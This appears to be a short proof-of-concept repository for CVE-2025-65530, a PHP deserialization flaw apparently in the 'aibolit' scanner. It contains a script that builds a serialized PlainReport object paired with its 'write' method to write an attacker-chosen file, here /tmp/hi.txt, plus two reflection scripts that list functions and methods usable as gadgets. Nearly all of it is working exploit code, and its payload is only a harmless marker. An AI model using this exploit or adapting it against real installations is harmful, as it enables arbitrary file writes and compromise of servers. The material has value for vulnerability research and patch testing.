a POC for CVE-2025-65530

cve_2025_65530.php

<?php
// a POC for CVE-2025-65530
class PlainReport
{
	protected $sanitize_signatures = false;
    protected $mnemo = [];
    private $extended_report = null;
    private $rapid_account_scan = null;
    private $ai_extra_warn = null;
    private $noPrefix = null;
    private $addPrefix = null;
    private $file = "/tmp/hi.txt";
    private $raw_report = "hello from aibolit";
}

$pr = new PlainReport();
$serialized = serialize([$pr, "write"]);
$escaped = str_replace("\x00", '\x00', $serialized);
echo $escaped . "\n";

list_functions.php

<?php
// list all functions that have < 2 required params
$funs = get_defined_functions();
foreach (array_merge($funs['internal'], $funs['user']) as $fname) {
    $fun = new ReflectionFunction($fname);
    if ($fun->getNumberOfRequiredParameters() < 2) {
        echo $fname . "( ";
        foreach ($fun->getParameters() as $param) {
            echo $param->getType() . " " . $param->getName() . ", ";
        }
        echo ")\n";
    }
}

list_methods.php

<?php
$classes = get_declared_classes();
foreach ($classes as $cname) {
    $cl = new ReflectionClass($cname);
    // can try getMethods(ReflectionMethod::IS_STATIC) for static methods only
    $methods = $cl->getMethods();
    foreach ($methods as $fun) {
        if ($fun->getNumberOfRequiredParameters() < 2) {
            echo "$cname ::" . $fun->getName() . "( ";
            foreach ($fun->getParameters() as $param) {
                echo $param->getType() . " " . $param->getName() . ", ";
            }
            echo ")\n";
        }
    }
}